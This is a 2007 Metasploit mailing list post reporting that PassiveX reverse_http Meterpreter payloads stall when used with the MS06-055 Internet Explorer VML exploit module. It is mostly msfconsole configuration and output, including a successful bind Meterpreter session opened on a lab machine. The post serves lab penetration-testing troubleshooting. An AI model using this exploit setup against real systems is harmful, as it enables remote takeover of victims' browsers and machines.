Metasploit mailing list archives
PassiveX-based payloads and MS06-055
From: buffer at softmedia.info (Angelo Dell'Aera)
Date: Tue, 13 Mar 2007 12:35:27 +0100
While doing few tests I noticed a strange behavior while trying to exploit the VML processing vulnerability in IE referenced by the Microsoft Bullettin MS06-055 on Windows XP SP1. The first thing I tried is using Meterpreter as shown below. msf exploit(ms06_055_vml_method) > show options Module options: Name Current Setting Required Description ------------------- -------- ----------- SRVHOST 192.168.33.130 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. URIPATH pentest no The URI to use for this exploit(default is random) Payload options: Name Current Setting Required Description ------------------- -------- ----------- DLL /home/buffer/msf3/data/meterpreter/metsrv.dll yes The local path to the DLL to upload EXITFUNC seh yes Exit technique: seh, thread, process LPORT 4444 yes The local port Exploit target: Id Name -- ---- 0 Windows NT 4.0 -> Windows 2003 SP1 msf exploit(ms06_055_vml_method) > exploit [*] Started bind handler [*] Using URL: http://192.168.33.130:8080/pentest [*] Server started. [*] Exploit running as background job. msf exploit(ms06_055_vml_method) > [*] Transmitting intermediate stager for over-sized stage...(89 bytes) [*] Sending stage (2834 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (73739 bytes)... [*] Upload completed. [*] Meterpreter session 2 opened (192.168.33.130:39557 -> 192.168.33.199:4444) ... and everything works fine. When I try using PassiveX Meterpreter instead... msf exploit(ms06_055_vml_method) > set PAYLOAD windows/meterpreter/reverse_http PAYLOAD => windows/meterpreter/reverse_http msf exploit(ms06_055_vml_method) > show options Module options: Name Current Setting Required Description ------------------- -------- ----------- SRVHOST 192.168.33.130 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. URIPATH pentest3 no The URI to use for this exploit (default is random) Payload options: Name Current Setting Required Description ------------------- -------- ----------- DLL /home/buffer/msf3/data/meterpreter/metsrv.dll yes The local path to the DLL to upload EXITFUNC seh yes Exit technique: seh, thread, process PXAXCLSID B3AC7307-FEAE-4e43-B2D6-161E68ABA838 yes ActiveX CLSID PXAXDLL /home/buffer/msf3/data/passivex/passivex.dll yes ActiveX DLL to inject PXAXVER -1,-1,-1,-1 yes ActiveX DLL Version PXHOST 192.168.33.130 yes The local HTTP listener hostname PXPORT 10000 yes The local HTTP listener port PXURI /OPrZwdoVOupJ0PB4rCdiaWXi1wIB5e9s no The URI root for requests I see this behavior... msf exploit(ms06_055_vml_method) > exploit [*] PassiveX listener started. [*] Using URL: http://192.168.33.130:8080/pentest3 [*] Server started. [*] Exploit running as background job. msf exploit(ms06_055_vml_method) > [*] Sending PassiveX main page to client and it stops here. I tried using other PassiveX-based payloads with the same exploit but no luck... always the same result. Other non PassiveX-based payloads work instead. I took a look at the registry and everything seems to work fine since Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 Values: 1004, 1200, 1201, 1001 are changed to the value 0 as expected. Regards, -- Angelo Dell'Aera 'buffer' Antifork Research, Inc. http://buffer.antifork.org Metro Olografix PGP information in e-mail header -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: not available URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070313/e9440e7c/attachment.pgp>
Current thread:
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 14)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 14)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 16)
- PassiveX-based payloads and MS06-055 Angelo Dell'Aera (Mar 13)
- PassiveX-based payloads and MS06-055 mmiller at hick.org (Mar 13)